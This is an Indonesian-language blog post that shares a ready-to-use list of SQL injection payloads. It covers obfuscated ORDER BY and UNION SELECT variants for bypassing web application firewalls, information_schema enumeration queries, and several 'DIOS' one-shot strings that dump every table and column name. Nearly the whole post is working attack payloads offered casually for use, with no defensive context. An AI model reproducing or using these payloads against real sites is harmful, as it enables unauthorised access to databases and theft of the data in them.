SQL Injection - Kumpulan DIOS dan Bypass Waff (Lengkap)

Gw bakalan share nih kumpulan DIOS Waff Bypass yang sering gw pake, daripada gw pake sendiri mending gw sebar, iya kan baby:v


Langsung aja ambil cuy:v

Order by :
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/

Union Select :
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

Information_shema.tables :
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

Concat :
CoNcAt()
concat()
CON%08CAT()
unhex(hex(/*!50000concat*/(table_name)))

Group_Concat :
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
convert(group_concat(/*!table_name*/)+using+ascii)

DIOS by Profexer a Russian Hacker:
(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)

DIOS by Dr.Z3ro:
(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))

DIOS by M@dBlood
(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

Shortest DIOS
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)


Udah segitu aja ya tmen temen:D, besok klo ada waktu gw tambah'in lagi DIOS nya.

Trima kasih untuk yang udah membaca.
Happy play security code

Share this post

Berlangganan update artikel terbaru via email: